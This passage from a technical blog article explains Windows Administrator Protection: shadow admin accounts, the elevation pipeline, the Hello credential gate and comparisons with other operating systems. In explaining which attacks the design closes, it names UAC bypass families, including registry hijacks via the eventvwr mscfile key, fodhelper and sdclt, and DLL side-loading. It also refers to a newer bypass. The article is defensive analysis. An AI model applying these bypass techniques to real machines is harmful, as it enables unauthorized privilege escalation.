&lt;p&gt;&lt;strong&gt;Per-elevation use.&lt;/strong&gt; &lt;code&gt;appinfo.dll&lt;/code&gt;&apos;s &lt;code&gt;RAiLaunchAdminProcess&lt;/code&gt; RPC endpoint reads &lt;code&gt;TypeOfAdminApprovalMode&lt;/code&gt;. When the value is 2, it walks the forward link to find the calling user&apos;s SMAA, launches &lt;code&gt;consent.exe&lt;/code&gt; on the secure desktop in &lt;em&gt;credential&lt;/em&gt; prompt mode (not Yes/No), authenticates the primary user via Windows Hello (PIN, fingerprint, face, or password fallback), asks the kernel to ask LSA for a fresh primary token for the SMAA in a brand-new logon session, and calls &lt;code&gt;CreateProcessAsUser&lt;/code&gt; with that token, the user&apos;s requested executable, and the SMAA&apos;s profile environment [@ms-developer-blog-2025, @ms-admin-protection, @forshaw-pz-jan2026]. The credential-less LSA logon at the heart of step three of this beat is walked in §7.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Teardown.&lt;/strong&gt; When the elevated process exits, the SMAA&apos;s token handle goes out of scope. The logon session is reaped. The elevated profile directory remains on disk at &lt;code&gt;C:\Users\ADMIN_&amp;lt;random&amp;gt;\&lt;/code&gt; -- it has to, to preserve per-elevation user state across reboots -- but the live admin token does not. There is no persistent High-integrity process running between elevations [@ms-developer-blog-2025].&lt;/p&gt;

flowchart TD
    Start[Policy enabled: TypeOfAdminApprovalMode = 2] --&amp;gt; Provision
    Provision[samsrv.dll: CreateShadowAdminAccount per local admin] --&amp;gt; Naming
    Naming[CreateRandomShadowAdminAccountName -&amp;gt; ADMIN_random] --&amp;gt; AddGroup
    AddGroup[AddAccountToLocalAdministratorsGroup] --&amp;gt; Link
    Link[SAM linkage: ShadowAccountForwardLinkSid /&lt;br /&gt;ShadowAccountBackLinkSid] --&amp;gt; Idle[SMAA exists, no token live]
    Idle --&amp;gt;|Each elevation| RPC[appinfo.dll: RAiLaunchAdminProcess]
    RPC --&amp;gt; Prompt[consent.exe: Hello credential prompt]
    Prompt --&amp;gt; LSA[Kernel asks LSA: credential-less logon for SMAA]
    LSA --&amp;gt; Run[CreateProcessAsUser with SMAA token]
    Run --&amp;gt;|Process exits| Teardown[Token handle released;&lt;br /&gt;logon session reaped]
    Teardown --&amp;gt; Idle

Windows creates a temporary isolated admin token to get the job done. This temporary token is immediately destroyed once the task is complete, ensuring that admin privileges do not persist. -- David Weston, Microsoft Ignite 2024 keynote, November 19, 2024 [@bleepingcomputer-2024]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The single design decision behind Administrator Protection: the elevated and unelevated halves of an administrator must be different accounts. Different SID, different profile, different &lt;code&gt;HKCU&lt;/code&gt;, different logon session, different DOS device object directory. The shared-resource attacks of the UAC bypass canon cannot persist if there are no shared resources.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The mechanism is now described. The next section walks it at function-name granularity for a single elevation, end to end -- and in particular, the credential-less LSA logon at step six that does the load-bearing work of minting the SMAA token without any SMAA credential.&lt;/p&gt;
&lt;h2&gt;7. The elevation pipeline end to end&lt;/h2&gt;
&lt;p&gt;Walk a single elevation. Nine steps.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The caller invokes &lt;code&gt;ShellExecute&lt;/code&gt; or &lt;code&gt;CreateProcess&lt;/code&gt; with an elevation request. For the shell-launched case the user right-clicks an executable and selects &quot;Run as administrator&quot;; the same RPC endpoint serves manifest-declared &lt;code&gt;requestedExecutionLevel = &quot;requireAdministrator&quot;&lt;/code&gt; callers and &lt;code&gt;Elevation:Administrator!new:&amp;lt;CLSID&amp;gt;&lt;/code&gt; COM moniker requests.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;appinfo.dll&lt;/code&gt;&apos;s &lt;code&gt;RAiLaunchAdminProcess&lt;/code&gt; RPC endpoint, hosted inside the Application Information service in &lt;code&gt;svchost.exe&lt;/code&gt;, receives the call [@ms-uac-how-it-works].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;appinfo&lt;/code&gt; reads &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\TypeOfAdminApprovalMode&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;If the value is 2 (Admin Approval Mode with Administrator Protection), &lt;code&gt;appinfo&lt;/code&gt; reads the calling user&apos;s SAM record, locates the &lt;code&gt;ShadowAccountForwardLinkSid&lt;/code&gt; attribute, and validates the corresponding &lt;code&gt;ShadowAccountBackLinkSid&lt;/code&gt; on the SMAA&apos;s SAM record. The linkage check is what binds a given elevated process to a given primary user; without both attributes pointing at each other, the elevation is refused [@call4cloud-osint].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;appinfo&lt;/code&gt; launches &lt;code&gt;consent.exe&lt;/code&gt; on the secure desktop in &lt;em&gt;credential&lt;/em&gt; prompt mode rather than the classic Yes/No mode. The prompt asks the primary user to authenticate via Windows Hello (PIN, fingerprint, face, or password fallback), not the SMAA. The SMAA &lt;em&gt;has no human credentials&lt;/em&gt;. The Windows Developer Blog states the property explicitly [@ms-developer-blog-2025], and Forshaw&apos;s January 2026 post restates it in operational terms: &quot;The user does not need to know the credentials for the shadow administrator as there aren&apos;t any. Instead UAC can be configured to prompt for the limited user&apos;s credentials, including using biometrics if desired&quot; [@forshaw-pz-jan2026].&lt;/li&gt;
&lt;li&gt;On a positive Hello result, &lt;code&gt;appinfo.dll&lt;/code&gt; -- running as &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt; inside the Application Information service -- asks the kernel to ask LSA for a fresh primary access token for the SMAA&apos;s SID in a brand-new logon session. The LSA logon is &lt;em&gt;credential-less&lt;/em&gt;. The kernel asks LSA to authenticate &quot;a new instance of the shadow administrator,&quot; and LSA fulfils the request without any SMAA credential because the SMAA has no credential to verify. The trust architecture mirrors the way the Service Control Manager asks LSA for service-account tokens: SCM is trusted to ask for the token; LSA mints it on the strength of the &lt;em&gt;request&lt;/em&gt; rather than on the strength of any credential. In Administrator Protection, &lt;code&gt;appinfo.dll&lt;/code&gt; is the trusted requester, and its request is gated on the user-side Hello result it received in step 5. The Forshaw verbatim that anchors the mechanism is below this section [@forshaw-pz-jan2026, @ms-developer-blog-2025].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;appinfo&lt;/code&gt; calls &lt;code&gt;CreateProcessAsUser&lt;/code&gt; with the SMAA token, the user&apos;s requested executable, and the SMAA&apos;s profile environment block (&lt;code&gt;USERPROFILE=C:\Users\ADMIN_&amp;lt;random&amp;gt;&lt;/code&gt;, &lt;code&gt;USERNAME=ADMIN_&amp;lt;random&amp;gt;&lt;/code&gt;, the SMAA&apos;s &lt;code&gt;NTUSER.DAT&lt;/code&gt; mapped as &lt;code&gt;HKCU&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;The new process loads at High integrity, holding the SMAA&apos;s primary token, in a fresh logon session with a freshly minted authentication-ID LUID. The DOS device directory at &lt;code&gt;\Sessions\0\DosDevices\&amp;lt;LUID&amp;gt;&lt;/code&gt; does not yet exist; the kernel will create it on first reference.&lt;/li&gt;
&lt;li&gt;Subsequent &lt;code&gt;SeAccessCheck&lt;/code&gt; calls on system objects evaluate against the SMAA&apos;s local Administrators group membership and succeed. The elevated process can write to &lt;code&gt;HKLM&lt;/code&gt;, modify program files, install services, load WHQL-signed drivers (subject to App Control for Business and HVCI), and otherwise behave as a member of the Administrators group [@ms-developer-blog-2025].&lt;/li&gt;
&lt;/ol&gt;

The mechanism by which the Local Security Authority mints a primary access token for the SMAA without verifying any SMAA credential. `appinfo.dll`, running as `NT AUTHORITY\SYSTEM` inside the Application Information service, requests the logon on the SMAA&apos;s behalf after the primary user has succeeded against the Hello credential gate. LSA fulfils the request because the *requester* is trusted; the architecture mirrors the way the Service Control Manager requests service-account tokens. The &quot;credential-less&quot; label is descriptive of the SMAA side of the exchange: the SMAA never has a human credential to verify, so LSA cannot and does not ask for one [@forshaw-pz-jan2026, @ms-developer-blog-2025].
&lt;p&gt;The trust architecture is not new in Administrator Protection. The Service Control Manager has asked LSA for service-account tokens since Windows NT 3.1 in 1993; LSA accepts the request because SCM is the trusted requester, not because the service account presented a credential. Administrator Protection generalises the same pattern to elevation: &lt;code&gt;appinfo.dll&lt;/code&gt; is the trusted requester, and the SMAA is its functional analogue of a service account. What is new is the user-side gate -- the trusted requester only makes the request after a positive Hello result on the &lt;em&gt;primary user&apos;s&lt;/em&gt; credential.&lt;/p&gt;

in Administrator Protection the kernel calls into the LSA and authenticates a new instance of the shadow administrator. This results in every token returned from `TokenLinkedToken` having a unique logon session, and thus does not currently have the DOS device object directory created. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]
&lt;p&gt;The &quot;unique logon session&quot; property in Forshaw&apos;s quote is exactly the structural property the lazy-DOS-device-directory bypass exploits, and §12 walks that exploit in full. For now, the load-bearing observation is the credential-less logon itself: the SMAA token is real, the logon session is real, the integrity level is real, but no SMAA credential ever changes hands. The trust is in the requester, gated by a Hello gesture from the primary user.&lt;/p&gt;

sequenceDiagram
    participant User as User shell (primary admin filtered token)
    participant AppInfo as appinfo.dll (NT AUTHORITY\SYSTEM)
    participant SAM as samsrv.dll / SAM database
    participant Consent as consent.exe (secure desktop)
    participant Hello as Windows Hello / TPM
    participant LSA as LSASS
    participant Elev as Elevated SMAA process&lt;pre&gt;&lt;code&gt;User-&amp;gt;&amp;gt;AppInfo: ShellExecute &quot;as admin&quot;
AppInfo-&amp;gt;&amp;gt;AppInfo: RAiLaunchAdminProcess RPC
AppInfo-&amp;gt;&amp;gt;AppInfo: Read TypeOfAdminApprovalMode = 2
AppInfo-&amp;gt;&amp;gt;SAM: Resolve ShadowAccountForwardLinkSid
SAM--&amp;gt;&amp;gt;AppInfo: SMAA SID + backlink check OK
AppInfo-&amp;gt;&amp;gt;Consent: Launch consent.exe (credential mode)
Consent-&amp;gt;&amp;gt;Hello: Request Hello gesture for primary user
Hello--&amp;gt;&amp;gt;Consent: PIN / biometric / password verified
Consent--&amp;gt;&amp;gt;AppInfo: Approved
AppInfo-&amp;gt;&amp;gt;LSA: Credential-less logon for SMAA (trusted-requester pattern)
LSA--&amp;gt;&amp;gt;AppInfo: Fresh SMAA primary token and fresh LUID
AppInfo-&amp;gt;&amp;gt;Elev: CreateProcessAsUser with SMAA token and profile
Note over Elev: Different SID and USERPROFILE and HKCU and LUID
Note over Elev: Integrity level High -- DOS device dir not yet created
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A practical illustration of the shift, displayed as the diff between the pre-AP and post-AP elevated console session.&lt;/p&gt;
&lt;p&gt;{`
// Modelled output of &apos;whoami /all&apos; run from an elevated console.
// Before: TypeOfAdminApprovalMode = 1 (classic UAC).
// After:  TypeOfAdminApprovalMode = 2 (Administrator Protection).&lt;/p&gt;
&lt;p&gt;const before = {
  user: &apos;CONTOSO\\alice&apos;,
  sid: &apos;S-1-5-21-123456789-987654321-1122334455-1001&apos;,
  profile: &apos;C:\\Users\\alice&apos;,
  authId: &apos;0x3e7:0x000abcde&apos;,
  integrity: &apos;S-1-16-12288 (High)&apos;,
  groups: [&apos;BUILTIN\\Administrators (Enabled)&apos;]
};&lt;/p&gt;
&lt;p&gt;const after = {
  user: &apos;WIN11-PC\\ADMIN_9f2c7e1bdc4a8033&apos;,
  sid: &apos;S-1-5-21-123456789-987654321-1122334455-1051&apos;,
  profile: &apos;C:\\Users\\ADMIN_9f2c7e1bdc4a8033&apos;,
  authId: &apos;0x3e7:0x000abf42&apos;,
  integrity: &apos;S-1-16-12288 (High)&apos;,
  groups: [&apos;BUILTIN\\Administrators (Enabled)&apos;],
  shadowBacklink: &apos;CONTOSO\\alice&apos;
};&lt;/p&gt;
&lt;p&gt;console.log(&apos;Different user name:&apos;, before.user !== after.user);
console.log(&apos;Different SID:&apos;,       before.sid !== after.sid);
console.log(&apos;Different profile:&apos;,   before.profile !== after.profile);
console.log(&apos;Different LUID:&apos;,      before.authId !== after.authId);
console.log(&apos;Same integrity:&apos;,      before.integrity === after.integrity);
`}&lt;/p&gt;
&lt;p&gt;The pipeline is now a single chain of named function calls. The next section asks what &lt;em&gt;changed&lt;/em&gt; about the four shared-resource properties from §3, and which UAC-bypass family each fix forecloses.&lt;/p&gt;
&lt;h2&gt;8. The four shared-resources fixes, precisely&lt;/h2&gt;
&lt;p&gt;Each of the four shared resources from §3 maps to a precise Administrator Protection fix, and each fix maps to a named UAC-era attack class it forecloses.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Shared resource (UAC)&lt;/th&gt;
&lt;th&gt;Administrator Protection fix&lt;/th&gt;
&lt;th&gt;UAC-era attack class foreclosed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Same SID across both tokens&lt;/td&gt;
&lt;td&gt;SMAA has its own SID; no shared user identity&lt;/td&gt;
&lt;td&gt;Same-user file and registry ACE confusion&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Same &lt;code&gt;%USERPROFILE%&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SMAA has &lt;code&gt;C:\Users\ADMIN_&amp;lt;random&amp;gt;\&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;DLL side-load family (sysprep / CRYPTBASE)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Same &lt;code&gt;HKCU&lt;/code&gt; hive&lt;/td&gt;
&lt;td&gt;SMAA has its own &lt;code&gt;NTUSER.DAT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Registry-hijack family (eventvwr, fodhelper, sdclt)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Same logon-session LUID&lt;/td&gt;
&lt;td&gt;SMAA gets a fresh LUID per elevation&lt;/td&gt;
&lt;td&gt;Token-theft via &lt;code&gt;TokenLinkedToken&lt;/code&gt;; logon-session DOS device hijack&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Profile separation.&lt;/strong&gt; The SMAA owns its own &lt;code&gt;%USERPROFILE%&lt;/code&gt; directory tree under &lt;code&gt;C:\Users\ADMIN_&amp;lt;random&amp;gt;\&lt;/code&gt;. Files created by elevated processes land there by default. Library folder divergence is the most visible consequence: an elevated Notepad&apos;s File &amp;gt; Save dialog opens at the SMAA&apos;s &lt;code&gt;Documents&lt;/code&gt;, not the primary user&apos;s. The primary user cannot see those files in their own Explorer without explicit cross-profile navigation. The structural property that closes is the writable-shared-directory premise of the Davidson 2009 DLL side-load family. Sysprep + CRYPTBASE was a profile-shared attack; without a shared profile, the elevated binary searches a different directory tree from the one the limited user can write to [@ms-developer-blog-2025].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Registry separation.&lt;/strong&gt; The SMAA&apos;s &lt;code&gt;HKCU&lt;/code&gt; maps to the SMAA&apos;s &lt;code&gt;NTUSER.DAT&lt;/code&gt;, not the primary user&apos;s. When &lt;code&gt;eventvwr.exe&lt;/code&gt;, running in an SMAA process, queries &lt;code&gt;HKCU\Software\Classes\mscfile\shell\open\command&lt;/code&gt;, it reads the SMAA&apos;s hive, not the primary user&apos;s. The primary user has no write access to the SMAA&apos;s &lt;code&gt;NTUSER.DAT&lt;/code&gt;. The entire registry-hijack family -- eventvwr / mscfile [@enigma0x3-2016-eventvwr], fodhelper / ms-settings, sdclt / IsolatedCommand [@enigma0x3-2017-sdclt], sdclt / App Paths [@enigma0x3-2017-app-paths] -- forecloses on the same property: the elevated binary&apos;s &lt;code&gt;HKCU&lt;/code&gt; lookup walks a hive the attacker does not control [@ms-developer-blog-2025].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Logon-session separation.&lt;/strong&gt; Every SMAA elevation gets a fresh authentication-ID LUID. The Local Security Authority allocates a new logon session for each elevation; when the elevated process exits, the session is reaped. Per-logon-session kernel resource caches, including the DOS device object directory at &lt;code&gt;\Sessions\0\DosDevices\&amp;lt;LUID&amp;gt;&lt;/code&gt; and the credential cache, do not flow across the boundary. Token handles cannot be reused. Drive-letter overrides under the limited user&apos;s logon session do not appear in the SMAA&apos;s session [@forshaw-pz-jan2026].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;No auto-elevation.&lt;/strong&gt; The &lt;code&gt;autoElevate=true&lt;/code&gt; manifest attribute is no longer honoured by &lt;code&gt;appinfo.dll&lt;/code&gt; under &lt;code&gt;TypeOfAdminApprovalMode = 2&lt;/code&gt;. Every elevation that previously went silent now prompts. The Windows Developer Blog states the change directly: &quot;With administrator protection, all auto-elevations in Windows are removed and users need to interactively authorize every admin operation&quot; [@ms-developer-blog-2025]. Forshaw&apos;s January 2026 framing of the consequence: &quot;as auto-elevation is no longer permitted they will always show a prompt, therefore these are not considered bypasses&quot; [@forshaw-pz-jan2026]. This is the single most consequential fix in the design. The auto-elevation whitelist &lt;em&gt;was&lt;/em&gt; the bypass; removing the whitelist eliminates the class at the source, including the entire silent-elevation primitive class that Forshaw&apos;s older &lt;code&gt;RAiProcessRunOnce&lt;/code&gt; research relied on.&lt;/p&gt;

Multi-user separation is the original UNIX privilege model. The `root` user holds privilege; ordinary users do not; the boundary between them is the file-permission system enforced by the kernel. Windows NT shipped the same primitives in 1993 -- discretionary access control lists on every securable object, per-user profiles, multi-user logon sessions -- but the surrounding culture treated Administrator-as-default as the path of least resistance. The architectural sophistication in Administrator Protection is in *linkage* (the SAM forward / back attributes), *lifecycle* (provisioning on policy enable, teardown on process exit), and *enforcement* (removal of auto-elevation as a mechanism). The primitives themselves are old.
&lt;p&gt;The four fixes share a property. Each one breaks a shared resource that an attacker depends on. But there is one more piece of the redesign that has not yet been described: the prompt itself is no longer a Yes/No click-through. The next section asks what happens when the consent UI becomes a credential.&lt;/p&gt;
&lt;h2&gt;9. Windows Hello as the consent gate&lt;/h2&gt;
&lt;p&gt;The classic UAC prompt is a Yes / No on the secure desktop. Administrator Protection turns the prompt into a &lt;em&gt;credential&lt;/em&gt; prompt for the &lt;em&gt;primary user&apos;s&lt;/em&gt; Windows Hello: a PIN, a fingerprint, a face match, or a password fallback. The credential is for the primary user, not the SMAA, because the SMAA has no human credentials; the Hello verification is what &lt;em&gt;authorises&lt;/em&gt; the cross-profile elevation [@ms-admin-protection, @ms-developer-blog-2025, @forshaw-pz-jan2026].&lt;/p&gt;
&lt;p&gt;To talk precisely about what the gate does, name the primitive it closes. Under classic UAC, the consent prompt treated a click on the secure desktop as sufficient evidence of consent; physical presence was the entire evidence requirement. That primitive shows up in three sub-cases that the UAC literature has documented for two decades.&lt;/p&gt;

The primitive by which the legacy UAC consent dialog accepted a click on the secure desktop as sufficient evidence of consent, without verifying *who* clicked. Three operational sub-cases follow. *Unattended-session click-through* -- an attacker (or co-located third party) with brief physical access to an unlocked screen showing a UAC prompt clicks Yes on the presumption that whoever is at the keyboard is the legitimate user. *Habituated-click click-through* -- the legitimate user has clicked Yes on hundreds of UAC prompts and clicks one more without conscious attention. *Pretext click-through* -- a malicious application argues a legitimate-looking case to the user and elicits the Yes click. Administrator Protection&apos;s credential gate cost-raises all three sub-cases without fully eliminating any [@forshaw-pz-jan2026, @ms-admin-protection].
&lt;p&gt;&lt;strong&gt;Unattended-session click-through.&lt;/strong&gt; An attacker who walks up to an unlocked screen showing a UAC prompt can click Yes and elevate. The legitimate user has authenticated; the prompt assumes the person at the keyboard is the legitimate user. Post-AP, the click is not sufficient. The Hello biometric or PIN is required, and the attacker (who does not know either) cannot complete the gesture. Microsoft&apos;s Ignite 2024 framing addresses this primitive implicitly with &quot;elevation rights only when needed&quot; and &quot;interactively authorize every admin operation&quot; [@bleepingcomputer-2024].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Habituated-click click-through.&lt;/strong&gt; A user who has clicked Yes on hundreds of UAC prompts over the course of a year clicks Yes on a malicious one as reflex. The classic UAC prompt requires no attentional engagement beyond physical presence and a click. Hello&apos;s gesture (a four-digit PIN entry, a fingerprint press, a face-recognition glance) is higher-friction and harder to perform inattentively. The Windows Developer Blog frames the property as &quot;just-in-time administrator privileges, incorporating Windows Hello to enhance both security and user convenience&quot; [@ms-developer-blog-2025].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pretext click-through.&lt;/strong&gt; A malicious application that argues its case to the user -- a fake installer, a re-skinned setup utility, a Trojan masquerading as a legitimate update -- can elicit a Yes click pre-AP. Post-AP, the user is also asked for a credential, which is a stronger user-side check. The user is more likely to interrogate &quot;why am I being asked for my PIN &lt;em&gt;again&lt;/em&gt;?&quot; than &quot;why is a prompt appearing?&quot; Microsoft Learn captures the intent as &quot;users are aware of potentially harmful actions before they occur, providing an extra layer of defense against threats&quot; [@ms-admin-protection].&lt;/p&gt;
&lt;p&gt;None of the three sub-cases is &lt;em&gt;fully&lt;/em&gt; eliminated. Forshaw is explicit that visible-prompt bypasses are not classified as security vulnerabilities by Microsoft&apos;s design-document position: bypasses that result in a visible prompt are not security bulletins, because the user could equivalently have launched the prompt themselves [@forshaw-pz-jan2026]. What the gate does is &lt;em&gt;cost-raise&lt;/em&gt; each sub-case. The unattended-screen attack requires a stolen PIN or coerced biometric. The habituated user must perform a gesture they cannot perform inattentively. The pretext attack must justify the second authentication, not just the first.&lt;/p&gt;
&lt;p&gt;What it does &lt;em&gt;not&lt;/em&gt; close is worth naming, because three primitives that look like they belong on the credential gate&apos;s account sheet were already closed by independent mechanisms, and the article should say so to avoid the common over-attribution mistake.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Synthetic-keystroke &lt;code&gt;SendInput&lt;/code&gt; against &lt;code&gt;consent.exe&lt;/code&gt;.&lt;/strong&gt; Already closed by UIPI in Vista 2006, and doubly closed by the secure-desktop switch to &lt;code&gt;Winsta0\Winlogon&lt;/code&gt;. Even UI Access processes -- whose purpose is to bypass UIPI for accessibility -- cannot reach into the secure desktop [@forshaw-pz-feb2026].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Headless UI Automation against the prompt.&lt;/strong&gt; Same UIPI / secure-desktop boundary closes it. Redundant with respect to the credential gate.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CVE-2019-1388-class UI-interaction paths surfaced through the prompt&apos;s own UI.&lt;/strong&gt; Closed by Microsoft&apos;s November 2019 HHCtrl patch and the cert-viewer UI redesign, prior to any Administrator Protection development [@nvd-cve-2019-1388].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The credential is hardware-rooted via &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM&lt;/a&gt; or &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton&lt;/a&gt; on capable hardware. The PIN is unsealed only under the user&apos;s gesture; the biometric flows through Enhanced Sign-in Security (ESS) on capable hardware; the credential itself never leaves the Trusted Platform Module or Pluton enclave when ESS is engaged [@ms-windows-hello-ess]. The detail of the Hello architecture itself -- FIDO2 attestation, the &lt;code&gt;ngc&lt;/code&gt; protector, the ESS isolation path through the Secure Kernel -- belongs to the &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello article&lt;/a&gt; in this series, and is not re-derived here.&lt;/p&gt;
&lt;p&gt;The new risk the gate does &lt;em&gt;not&lt;/em&gt; close is the obvious one. Phishing the prompt now phishes a &lt;em&gt;real credential&lt;/em&gt;, not just consent. A malicious application that can convince the user to authenticate on its behalf gets the elevation the user would otherwise have given to a legitimate request. The credential remains hardware-rooted and is not exfiltrated to the malware, but the elevation produces a working SMAA token in the attacker&apos;s process. This is the surface §15 carries forward to open problems.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The credential gate closes one specific primitive: &lt;em&gt;consent-without-identity-verification&lt;/em&gt;. It cost-raises three sub-cases (unattended-session, habituated-click, pretext click-through) without eliminating any. The structural boundary is profile separation plus fresh logon session plus auto-elevation removal; the credential gate is the fourth, defence-in-depth, property that ensures the boundary cannot be silently crossed by anyone holding only the limited user&apos;s physical access.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The prompt is a credential gate, but it remains a UI element. The next section asks how this elevation model compares to what other operating systems do.&lt;/p&gt;
&lt;h2&gt;10. Competing approaches: what other operating systems do&lt;/h2&gt;
&lt;p&gt;Three one-paragraph treatments. The article does not re-derive each system; it positions Administrator Protection against the field.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Linux: &lt;code&gt;sudo&lt;/code&gt; plus PolKit &lt;code&gt;pkexec&lt;/code&gt; plus PAM modules.&lt;/strong&gt; The authority model on Linux is file-based. &lt;code&gt;/etc/sudoers&lt;/code&gt; (or its LDAP equivalent) is the policy table; the &lt;code&gt;sudoers&lt;/code&gt; plugin reads it and decides whether to permit a given user to run a given command [@sudo-ws-sudoers]. PolKit -- &lt;code&gt;polkitd&lt;/code&gt; and its authentication-agent helpers -- is the parallel mechanism for GUI privileged-service requests, with actions and mechanisms separated in the polkit configuration files [@polkit-docs]. Biometric integration arrives through the PAM stack: &lt;code&gt;pam_fprintd&lt;/code&gt; for fingerprint, &lt;code&gt;pam_u2f&lt;/code&gt; for FIDO2 tokens, &lt;code&gt;pam_yubico&lt;/code&gt; for Yubikeys. There is no profile separation by default; &lt;code&gt;sudo -i&lt;/code&gt; switches &lt;code&gt;HOME&lt;/code&gt; to root&apos;s home directory but does not separate per-elevation. The model is per-command authorisation, not per-account isolation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;macOS: Authorization Services plus Touch ID via &lt;code&gt;pam_tid&lt;/code&gt;.&lt;/strong&gt; GUI elevation prompts are gated by &lt;code&gt;authorizationdb&lt;/code&gt;, a property-list-format policy database whose rules name which credentials (admin password, Touch ID, system-wide entitlements) authorise which actions [@apple-auth-services]. Touch ID is verified by the Secure Enclave Processor; the credential never leaves the SEP, and Authorization Services integrates with &lt;code&gt;pam_tid&lt;/code&gt; to allow &lt;code&gt;sudo&lt;/code&gt; invocations to use the gesture [@apple-pam-tid]. There is no separate admin profile; Transparency, Consent, and Control (TCC) guards privileged resource access at the per-action level, not the per-profile level. The Mac architecture privileges hardware-rooted consent (Touch ID, Secure Enclave) over account separation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft&apos;s own &lt;code&gt;sudo.exe&lt;/code&gt; (Windows 11 24H2).&lt;/strong&gt; An inbox terminal transport that triggers the &lt;em&gt;existing&lt;/em&gt; UAC or Administrator Protection pipeline; not an alternative to either [@ms-sudo-docs]. The &lt;code&gt;forceNewWindow&lt;/code&gt; mode opens an elevated console in a new window. The &lt;code&gt;disableInput&lt;/code&gt; mode keeps the elevated console in the current window but blocks keyboard input to it from the unelevated terminal. The &lt;code&gt;normal&lt;/code&gt; (inline) mode preserves POSIX-style pipes between the unelevated and elevated processes. Microsoft Learn warns explicitly about the inline mode: &quot;Sudo for Windows can be used as a potential escalation of privilege vector when enabled in certain configurations&quot; [@ms-sudo-docs]. The mechanism is RPC between the unelevated and elevated &lt;code&gt;sudo.exe&lt;/code&gt; processes; the elevation itself still goes through &lt;code&gt;appinfo.dll&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Intune Endpoint Privilege Management (EPM).&lt;/strong&gt; Cloud-policy-driven virtual-account elevation [@ms-epm-overview]. EPM performs elevation via a &lt;em&gt;virtual&lt;/em&gt; account that is not a member of the local Administrators group; the elevation rights are conferred only for the duration of the policy-permitted action. Three elevation modes are available: Automatic (no user interaction), User-confirmed (a prompt), and Elevate as Current User (the action runs as the user&apos;s elevated identity rather than the virtual account). EPM is architecturally complementary to Administrator Protection: EPM is the &lt;em&gt;enterprise policy&lt;/em&gt; story, Administrator Protection is the &lt;em&gt;per-device architecture&lt;/em&gt; story. The two can coexist on the same device.&lt;/p&gt;
&lt;p&gt;The distinguishing property of Administrator Protection in this comparison is whole-profile separation: the SMAA&apos;s own profile, the SMAA&apos;s own &lt;code&gt;HKCU&lt;/code&gt;, the SMAA&apos;s own library folders, plus a fresh logon session per elevation. Neither Linux &lt;code&gt;sudo&lt;/code&gt; nor macOS Authorization Services provides that property as a default desktop primitive. EPM provides per-elevation isolation via the virtual account but does not give the elevated process a persistent profile, which is what makes Administrator Protection&apos;s compatibility story so different from EPM&apos;s.&lt;/p&gt;
&lt;p&gt;Administrator Protection is the architecturally tightest desktop elevation model now in production. The next section asks where the boundary still leaks.&lt;/p&gt;
&lt;h2&gt;11. Theoretical limits: what Administrator Protection cannot fix&lt;/h2&gt;
&lt;p&gt;Four structural ceilings.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Showing a prompt is not crossing the boundary.&lt;/strong&gt; Microsoft&apos;s design position is explicit: bypasses that result in a &lt;em&gt;visible&lt;/em&gt; elevation prompt are not security bulletins, because the user could equivalently have right-clicked &quot;Run as administrator.&quot; Forshaw&apos;s January 2026 post states the position verbatim: &quot;I expect that malware will still be able to get administrator privileges even if that&apos;s just by forcing a user to accept the elevation prompt&quot; [@forshaw-pz-jan2026]. The operational consequence is that social-engineering the consent dialog remains a structural attack surface. The prompt is a UI element. The boundary is the credential gate. The gate is only as strong as the user&apos;s resistance to whatever pretext induces them to authenticate.&lt;/p&gt;

